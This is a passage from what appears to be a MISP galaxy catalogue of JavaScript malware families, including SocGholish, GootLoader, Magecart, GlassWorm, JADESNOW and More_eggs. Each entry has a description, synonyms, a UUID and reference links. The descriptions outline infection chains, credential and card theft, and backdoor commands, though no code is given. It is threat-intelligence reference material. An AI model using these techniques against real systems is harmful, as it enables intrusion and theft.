- https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum - webarchive
- http://www.pwncode.io/2018/05/javascript-based-bot-using-github-c.html - webarchive
- https://securelist.com/apt-trends-report-q3-2020/99204/ - webarchive
- https://github.com/eset/malware-ioc/tree/master/evilnum - webarchive
- https://securelist.com/deathstalker-mercenary-triumvirate/98177/ - webarchive
- https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/ - webarchive
- http://blog.nsfocus.net/agentvxapt-evilnum/ - webarchive
- https://blog.prevailion.com/2020/05/phantom-in-command-shell5.html - webarchive
- https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/ - webarchive
- https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw - webarchive
- https://www.zscaler.com/blogs/security-research/return-evilnum-apt-updated-ttps-and-new-targets - webarchive
- https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FakeUpdateRU
FakeUpdateRU is a malicious JavaScript code injected into compromised websites to deliver further malware using the drive-by download technique. The malicious code displays a copy of the Google Chrome web browser download page and redirects the user to the download of a next-stage payload.
Internal MISP references
UUID 9106e280-febe-45a3-9cd1-cbffafc0c85b which can be used as unique global reference for FakeUpdateRU in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
FAKEUPDATES
FAKEUPDATES is a downloader written in JavaScript that communicates via HTTP. Supported payload types include executables and JavaScript. It writes the payloads to disk prior to launching them. FAKEUPDATES has led to further compromise via additional malware families that include CHTHONIC, DRIDEX, EMPIRE, KOADIC, DOPPELPAYMER, and AZORULT.
FAKEUPDATES has been heavily used by UNC1543, a financially motivated group.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FAKEUPDATES.
| Known Synonyms |
|---|
| FakeUpdate |
| GhoLoader |
| SocGholish |
Internal MISP references
UUID cff35ce3-8d6f-417b-ae6c-a9e6a60ee26c which can be used as unique global reference for FAKEUPDATES in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.fakeupdates - webarchive
- https://intel471.com/blog/threat-hunting-case-study-socgholish - webarchive
- https://experience.mandiant.com/trending-evil/p/1 - webarchive
- https://trac-labs.com/dont-ghost-the-socgholish-ghostweaver-backdoor-574154dd9983 - webarchive
- http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
- https://www.lac.co.jp/lacwatch/report/20220407_002923.html - webarchive
- https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee - webarchive
- https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/ - webarchive
- https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/d/thwarting-loaders-from-socgholish-to-blisters-lockbit-payload/iocs-thwarting-loaders-socgholish-blister.txt - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-socgholish-and-zloader-from-fake-updates-and-installers-to-owning-your-systems - webarchive
- https://www.linkedin.com/pulse/ransomhub-ransomware-deploys-malware-breach-corporate-hb44c/ - webarchive
- https://www.trendmicro.com/en_us/research/25/c/socgholishs-intrusion-techniques-facilitate-distribution-of-rans.html - webarchive
- https://krebsonsecurity.com/2025/02/notorious-malware-spam-host-prospero-moves-to-kaspersky-lab/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Q4%202023%20Botnet%20Threat%20Update.pdf - webarchive
- https://twitter.com/MsftSecIntel/status/1522690116979855360 - webarchive
- https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions - webarchive
- https://blog.sucuri.net/2022/08/socgholish-5-years-of-massive-website-infections.html - webarchive
- https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/ - webarchive
- https://www.intrinsec.com/wp-content/uploads/2024/04/TLP-CLEAR-Matanbuchus-Co-Code-Emulation-and-Cybercrime-Infrastructure-Discovery-1.pdf - webarchive
- https://www.intrinsec.com/wp-content/uploads/2024/11/TLP-CLEAR-PROSPERO-Proton66-Uncovering-the-links-between-bulletproof-networks.pdf - webarchive
- https://x.com/GenThreatLabs/status/1840762181668741130 - webarchive
- https://expel.io/blog/incident-report-spotting-socgholish-wordpress-injection/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/06/makemoney-malvertising-campaign-adds-fake-update-template/ - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf - webarchive
- https://www.digitalinformationworld.com/2022/04/threatening-redirect-web-service.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2018/04/fakeupdates-campaign-leverages-multiple-website-platforms/ - webarchive
- https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm - webarchive
- https://services.google.com/fh/files/misc/threat_horizons_report_h1_2025.pdf - webarchive
- https://killingthebear.jorgetesta.tech/actors/evil-corp - webarchive
- https://www.mandiant.com/resources/they-come-in-the-night-ransomware-deployment-trends - webarchive
- https://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting - webarchive
- https://www.sentinelone.com/labs/socgholish-diversifies-and-expands-its-malware-staging-infrastructure-to-counter-defenders/ - webarchive
- https://www.trendmicro.com/en_us/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html - webarchive
- https://www.malwarebytes.com/blog/news/2024/12/malicious-ad-distributes-socgholish-malware-to-kaiser-permanente-employees - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta569-socgholish-and-beyond - webarchive
- https://www.silentpush.com/blog/socgholish/ - webarchive
- https://arcticwolf.com/resources/blog/romcom-utilizing-socgholish-to-deliver-mythic-agent-to-usa-companies-supporting-ukraine/ - webarchive
- https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/update-fake-updates-two-new-actors-and-new-mac-malware - webarchive
- https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack - webarchive
- https://www.intrinsec.com/prospero-proton66-tracing-uncovering-the-links-between-bulletproof-networks/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jul-Dec%202024%20Botnet%20Threat%20Update.pdf - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
- https://www.menlosecurity.com/blog/increase-in-attack-socgholish - webarchive
- https://blog.morphisec.com/coinlurker-the-stealer-powering-the-next-generation-of-fake-updates - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GlassWorm
According to Koi Security, this malware harvests NPM, GitHub, and Git credentials for supply chain propagation. It targets 49 different cryptocurrency wallet extensions to drain funds. It uses stolen credentials to compromise additional packages and extensions, spreading the worm further. Furthermore, it deploys SOCKS proxy servers, turning developer machines into criminal infrastructure and installs hidden VNC servers for complete remote access.
Internal MISP references
UUID 14a725a9-d610-4c3e-bce1-188fc1035749 which can be used as unique global reference for GlassWorm in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
GootLoader
According to PCrisk, GootLoader was discovered while examining legitimate but compromised websites (mainly sites managed with WordPress). GootLoader is used to infect computers with additional malware; the cybercriminals using it seek to trick users into unknowingly downloading and executing it by disguising it as a document or other file.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GootLoader.
| Known Synonyms |
|---|
| SLOWPOUR |
Internal MISP references
UUID 5b2569e5-aeb2-4708-889f-c6d598bd5e14 which can be used as unique global reference for GootLoader in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.gootloader - webarchive
- https://experience.mandiant.com/trending-evil/p/1 - webarchive
- https://labs.sentinelone.com/gootloader-initial-access-as-a-service-platform-expands-its-search-for-high-value-targets/ - webarchive
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ - webarchive
- https://www.kroll.com/en/insights/publications/cyber/deep-dive-gootloader-malware-infection-chain - webarchive
- https://gootloader.wordpress.com/2024/02/14/my-game-retired-latest-changes-to-gootloader/ - webarchive
- https://www.reliaquest.com/blog/gootloader-infection-credential-access/ - webarchive
- https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/ - webarchive
- https://blogs.blackberry.com/en/2022/07/gootloader-from-seo-poisoning-to-multi-stage-downloader - webarchive
- https://krebsonsecurity.com/2025/02/notorious-malware-spam-host-prospero-moves-to-kaspersky-lab/ - webarchive
- https://gootloader.wordpress.com/2024/06/24/gootloaders-new-hideout-revealed-the-malware-hunt-in-wordpress-shadows/ - webarchive
- https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/ - webarchive
- https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Detecting-GOOTLOADER-with-Google-Security/ba-p/823766 - webarchive
- https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations - webarchive
- https://github.com/struppigel/hedgehog-tools/tree/main/gootloader - webarchive
- https://www.intrinsec.com/wp-content/uploads/2024/11/TLP-CLEAR-PROSPERO-Proton66-Uncovering-the-links-between-bulletproof-networks.pdf - webarchive
- https://www.esentire.com/blog/gootloader-leads-to-cobalt-strike-and-hand-on-keyboard-activity - webarchive
- https://services.google.com/fh/files/misc/m-trends-2025-en.pdf - webarchive
- https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf - webarchive
- https://securityintelligence.com/x-force/gootbot-gootloaders-new-approach-to-post-exploitation/ - webarchive
- https://community.riskiq.com/article/f5d5ed38 - webarchive
- https://threatresearch.ext.hp.com/tips-for-automating-ioc-extraction-from-gootloader-a-changing-javascript-malware/ - webarchive
- https://malasada.tech/gootloader-isnt-broken/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/gootloader-why-your-legal-document-search-may-end-in-misery/ - webarchive
- https://gootloader.wordpress.com/2025/03/31/gootloader-returns-malware-hidden-in-google-ads-for-legal-documents/ - webarchive
- https://news.sophos.com/en-us/2024/11/06/bengal-cat-lovers-in-australia-get-psspsspssd-in-google-driven-gootloader-campaign/ - webarchive
- https://intel471.com/blog/threat-hunting-case-study-tracking-down-gootloader - webarchive
- https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html - webarchive
- https://gootloader.wordpress.com/2023/01/05/what-is-gootloader/ - webarchive
- https://dinohacks.blogspot.com/2022/06/loading-gootloader.html - webarchive
- https://news.sophos.com/en-us/2021/08/12/gootloaders-mothership-controls-malicious-content/ - webarchive
- https://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation - webarchive
- https://redcanary.com/blog/gootloader - webarchive
- https://www.esentire.com/web-native-pages/gootloader-unloaded - webarchive
- https://www.intrinsec.com/prospero-proton66-tracing-uncovering-the-links-between-bulletproof-networks/ - webarchive
- https://x.com/MsftSecIntel/status/1836456406276342215 - webarchive
- https://www.esentire.com/blog/gootloader-striking-with-a-new-infection-technique - webarchive
- https://gootloader.wordpress.com/2023/01/05/gootloader-command-control/ - webarchive
- https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/ - webarchive
- https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
grelos
grelos is a skimmer used for Magecart-style attacks.
Internal MISP references
UUID 79580c0b-c390-4421-976a-629a5c11af95 which can be used as unique global reference for grelos in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Griffon
GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Griffon.
| Known Synonyms |
|---|
| Harpy |
Internal MISP references
UUID 85c25380-69d7-4d7e-b279-6b6791fd40bd which can be used as unique global reference for Griffon in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-niagara - webarchive
- https://www.mandiant.com/resources/evolution-of-fin7 - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/ - webarchive
- https://twitter.com/ItsReallyNick/status/1059898708286939136 - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.deepinstinct.com/blog/understanding-the-windows-javascript-threat-landscape - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
- https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/would-you-exchange-your-security-for-a-gift-card/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
inter
Internal MISP references
UUID 36b0f1a0-29a4-4ec5-bca2-18a241881d49 which can be used as unique global reference for inter in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
JADESNOW
JADESNOW is a JavaScript-based downloader malware family associated with the threat cluster UNC5342. JADESNOW utilizes EtherHiding to fetch, decrypt, and execute malicious payloads from smart contracts on the BNB Smart Chain and Ethereum. The input data stored in the smart contract may be Base64-encoded and XOR-encrypted. The final payload in the JADESNOW infection chain is usually a more persistent backdoor like INVISIBLEFERRET.JAVASCRIPT.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular JADESNOW.
| Known Synonyms |
|---|
| ChainedDown |
Internal MISP references
UUID 76d1e9ce-1d02-4b63-9ce8-8f079c852244 which can be used as unique global reference for JADESNOW in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.jadesnow - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding - webarchive
- https://www.aikido.dev/blog/react-native-aria-attack - webarchive
- https://www.aikido.dev/blog/catching-a-rat-remote-access-trojian-rand-user-agent-supply-chain-compromise - webarchive
- https://ransom-isac.org/blog/cross-chain-txdatahiding-crypto-heist/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Jeniva
Internal MISP references
UUID b0631a44-3264-429d-b8bc-3a27e27be305 which can be used as unique global reference for Jeniva in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
Jetriz
Internal MISP references
UUID 9e6a0a54-8b55-4e78-a3aa-15d1946882e1 which can be used as unique global reference for Jetriz in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
jspRAT
Internal MISP references
UUID 71903afc-7129-4821-90e5-c490e4902de3 which can be used as unique global reference for jspRAT in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KongTuke
KongTuke is a sophisticated traffic direction system (TDS) that was first observed around May 2024. Making use of compromised CMS websites, KongTuke redirects site visitors through a multi-stage infection process that ultimately leads to device infection. It initially used fake update lures and switched to fake CAPTCHA lures at the beginning of 2025. It is likely operated as an initial access service, selling infections to both ransomware affiliates and other initial access vendors such as SocGholish.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular KongTuke.
| Known Synonyms |
|---|
| TAG-124 |
| js.LandUpdate808 |
Internal MISP references
UUID 399a788c-0487-403d-903e-715afe56b9f0 which can be used as unique global reference for KongTuke in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.kongtuke - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/yet-another-nodejs-backdoor-yanb-a-modern-challenge/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2025-0130.pdf - webarchive
- https://malasada.tech/the-landupdate808-fake-update-variant/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
KopiLuwak
Internal MISP references
UUID 2269d37b-87e9-460d-b878-b74a2f4c3537 which can be used as unique global reference for KopiLuwak in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak - webarchive
- https://blog.angelalonso.es/2017/10/analysis-of-malicious-doc-used-by-turla.html - webarchive
- https://pdfhost.io/v/F0@QElMu2_MacProStorage_2017FinalBitdefenderWhitepaperNetrepserA4en_ENBitdefenderWhitepaperNetrepserA4en_ENindd.pdf - webarchive
- https://securelist.com/shedding-skin-turlas-fresh-faces/88069/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack - webarchive
- https://www.mandiant.com/resources/blog/turla-galaxy-opportunity - webarchive
- https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/ - webarchive
- https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
LNKR
The LNKR trojan is a malicious browser extension that monitors the websites visited by the user, looking for pages on which the user has administrative privileges, such as blog sites or web-based virtual learning environments. When the administrative user posts to such a page, the infected extension executes a stored cross-site scripting attack and injects malicious JavaScript into the legitimate HTML of the page. This is used to redirect the site's other visitors to both benign and malicious domains.
Internal MISP references
UUID 1a85acf3-4bda-49b4-9e50-1231f0b7340a which can be used as unique global reference for LNKR in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.lnkr - webarchive
- https://github.com/Zenexer/lnkr - webarchive
- https://krebsonsecurity.com/2020/03/the-case-for-limiting-your-browser-extensions/ - webarchive
- https://github.com/Zenexer/lnkr/blob/master/recon/extensions/fanagokoaogopceablgmpndejhedkjjb/README.md - webarchive
- https://www.riskiq.com/blog/labs/lnkr-browser-extension/ - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
magecart
Magecart is a malware framework intended to steal credit card information from compromised eCommerce websites. Used in criminal activities, it is a sophisticated implant built on top of relays, command and control servers and anonymizers that are used to steal eCommerce customers' credit card information. The first stage is typically implemented in JavaScript included in a compromised checkout page. It copies data from input fields and sends it to a relay, which collects credit card data coming from a subset of compromised eCommerce sites and forwards it to command and control servers.
Internal MISP references
UUID f53e404b-0dcd-4116-91dd-cad94fc41936 which can be used as unique global reference for magecart in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart - webarchive
- https://geminiadvisory.io/magecart-google-tag-manager/ - webarchive
- https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218 - webarchive
- https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/ - webarchive
- https://scotthelme.co.uk/introducing-script-watch-detect-magecart-style-attacks-fast/?utm_source=dlvr.it&utm_medium=twitter - webarchive
- https://community.riskiq.com/article/2efc2782 - webarchive
- https://blog.sucuri.net/2025/02/google-tag-manager-skimmer-steals-credit-card-info-from-magento-site.html - webarchive
- https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/ - webarchive
- https://sansec.io/research/magecart-corona-lockdown - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0719.pdf - webarchive
- https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/ - webarchive
- https://community.riskiq.com/article/743ea75b/description - webarchive
- https://medium.com/@0x_b0mb3r/technical-analysis-magecart-skimmer-da099d897e38 - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/fin6-compromised-e-commerce-platform-via-magecart-to-inject-credit-card-skimmers-into-thousands-of-online-shops/ - webarchive
- https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html - webarchive
- https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/ - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/06/web-skimmer-hides-within-exif-metadata-exfiltrates-credit-cards-via-image-files/ - webarchive
- https://www.riskiq.com/blog/labs/magecart-group-12-olympics/ - webarchive
- https://www.riskiq.com/blog/labs/magecart-nutribullet/ - webarchive
- https://www.zdnet.com/article/web-skimmers-found-on-the-websites-of-intersport-claires-and-icing/ - webarchive
- https://blog.sucuri.net/2020/11/css-js-steganography-in-fake-flash-player-update-malware.html - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/ - webarchive
- https://medium.com/@louis.o.schuermann/technical-analysis-magecart-skimmer-da099d897e38 - webarchive
- https://blog.sucuri.net/2020/04/web-skimmer-with-a-domain-name-generator.html - webarchive
- https://www.reflectiz.com/the-gocgle-web-skimming-campaign/ - webarchive
- https://www.zscaler.com/blogs/security-research/black-friday-scams-4-emerging-skimming-attacks-watch-holiday-season - webarchive
- https://sansec.io/research/magento-2-persistent-parasite - webarchive
- https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/injecting-magecart-into-magento-global-config/ - webarchive
- https://maxkersten.nl/2020/02/24/closing-in-on-magecart-12/ - webarchive
- https://www.goggleheadedhacker.com/blog/post/14 - webarchive
- https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/ - webarchive
- https://www.perimeterx.com/blog/analyzing_magecart_malware_from_zero_to_hero/ - webarchive
- https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/ - webarchive
- https://blog.sucuri.net/2023/12/40-new-domains-of-magecart-veteran-atmzow-found-in-google-tag-manager.html - webarchive
- https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2021/09/the-many-tentacles-of-magecart-group-8/ - webarchive
- https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/ - webarchive
- https://community.riskiq.com/article/fda1f967 - webarchive
- https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf - webarchive
- https://blog.malwarebytes.com/cybercrime/2021/06/lil-skimmer-the-magecart-impersonator/ - webarchive
- https://www.riskiq.com/blog/labs/magecart-medialand/ - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/ - webarchive
- https://maxkersten.nl/2020/02/17/following-the-tracks-of-magecart-12/ - webarchive
- https://marcoramilli.com/2020/02/19/uncovering-new-magecart-implant-attacking-ecommerce/ - webarchive
- https://community.riskiq.com/article/14924d61 - webarchive
- https://www.reflectiz.com/ico-fines-ticketmaster-uk-1-25-million-for-security-failures-a-lesson-to-be-learned/ - webarchive
- https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html - webarchive
- https://community.riskiq.com/article/30f22a00 - webarchive
- https://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/ - webarchive
- https://securelist.com/apt-trends-report-q2-2019/91897/ - webarchive
- https://twitter.com/MBThreatIntel/status/1416101496022724609 - webarchive
- https://geminiadvisory.io/keeper-magecart-group-infects-570-sites/ - webarchive
- https://twitter.com/AffableKraut/status/1385030485676544001 - webarchive
- https://blog.sucuri.net/2020/04/web-skimmer-with-a-domain-name-generator-follow-up.html - webarchive
- https://geminiadvisory.io/wp-content/uploads/2020/07/Appendix-C-1.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/us-local-government-services-targeted-by-new-magecart-credit-card-skimming-attack/ - webarchive
- https://community.riskiq.com/article/5bea32aa - webarchive
- https://sansec.io/research/north-korea-magecart - webarchive
- https://community.riskiq.com/article/017cf2e6 - webarchive
- https://www.riskiq.com/blog/labs/misconfigured-s3-buckets/ - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2021/10/q-logger-skimmer-keeps-magecart-attacks-going/ - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
- https://twitter.com/AffableKraut/status/1415425132080816133?s=20 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
megaMedusa
MegaMedusa is a Node.js Layer-7 DDoS tool provided by the RipperSec team.
Internal MISP references
UUID 8a51e636-13be-4bdc-a32f-2d832263ba5b which can be used as unique global reference for megaMedusa in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MiniJS
MiniJS is a very simple JavaScript-based first-stage backdoor. The backdoor is probably distributed via spearphishing email. Due to infrastructure overlap, the malware can be attributed to the actor Turla. Comparable JavaScript-based backdoor families of the actor are KopiLuwak and IcedCoffee.
Internal MISP references
UUID 5fd2f4f0-0591-45bb-a843-c194d5e294cd which can be used as unique global reference for MiniJS in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
MintsLoader
According to Orange Cyberdefense, MintsLoader is a little-known, multi-stage malware loader that has been in use since at least February 2023. It has been observed in widespread distribution campaigns between July and October 2024. The name comes from its very characteristic use of the URL parameter "1.php?s=mintsXX" (with XX being numbers).
MintsLoader primarily delivers RAT or infostealer payloads such as AsyncRAT and Vidar through phishing emails, targeting organizations in Europe (Spain, Italy, Poland, etc.). Written in JavaScript and PowerShell, MintsLoader operates through a multi-step infection process involving several URLs and domains, most of which are produced by a domain generation algorithm (DGA) using the .top TLD.
Internal MISP references
UUID 0cd219f4-1f3b-4958-b678-173257abd67e which can be used as unique global reference for MintsLoader in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.mints_loader - webarchive
- https://www.silentpush.com/blog/socgholish/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/asyncrat-loader-obfuscation-dgas-decoys-and-govno - webarchive
- https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software - webarchive
- https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery - webarchive
- https://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting - webarchive
- https://www.spamhaus.org/resource-hub/cybercrime/pec-invoice-scam/ - webarchive
- https://nikhilh-20.github.io/blog/deob_js_ast/ - webarchive
- https://www.youtube.com/watch?v=Ep8STRLKS6I - webarchive
- https://www.youtube.com/watch?v=yqM9ekIRlMA - webarchive
- https://github.com/cert-orangecyberdefense/mintsloader - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2025-0130.pdf - webarchive
- https://x.com/CERTCyberdef/status/1849392561024065779 - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| type | [] |
More_eggs
More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:
- d&exec = download and execute a PE file
- gtfo = delete files/startup entries and terminate
- more_eggs = download additional/new scripts
- more_onion = run a new script and terminate the current script
- more_power = run command shell commands
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular More_eggs.
| Known Synonyms |
|---|
| SKID |
| SpicyOmelette |
Internal MISP references
UUID 1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f which can be used as unique global reference for More_eggs in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs - webarchive
- https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/ - webarchive
- https://attack.mitre.org/software/S0284/ - webarchive
